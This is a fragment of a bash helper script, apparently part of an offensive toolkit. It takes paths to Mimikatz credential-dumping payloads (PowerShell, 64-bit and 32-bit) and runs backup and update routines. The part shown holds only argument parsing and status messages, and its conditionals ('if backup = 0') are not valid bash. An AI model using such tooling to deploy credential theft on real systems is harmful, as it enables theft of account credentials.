	-ps1|--ps1)
		#move to the next in line
		shift
		MKATZ_FILE="$1"
		;;
	-x64|--x64)
		#move to next in line
		shift
		PKATZ64="$1"
		;;
	-x32|--x32)
		#move to next in line
		shift
		PKATZ32="$1"
		;;
	*)
		show_parms
		exit 1
		;;
	esac
	shift
done

if backup = 0; then
	echo -e  "$COL_GREEN[+] Proceeding with the update...$COL_RESET"
	if update = 0; then
		echo -e "$COL_BLUE[!] Script completed successfully.  Happy Hacking!$COL_RESET"
		exit 0
	else
		show_parms
		echo -e "$COL_RED[-]Something went wrong with the update. Try again later.$COL_RESET"
		exit 1
	fi
else 	
	show_parms
	echo -e "$COL_RED[-]Unable to backup the script.  Cannot continue until we have a backup.$COL_RESET"
	exit 1
fi
echo -e "$COL_RED[!!]There's no way we should be here.  You must be a wizard Harry!$COL_RESET"
exit 1337

Source : https://github.com/Graph-X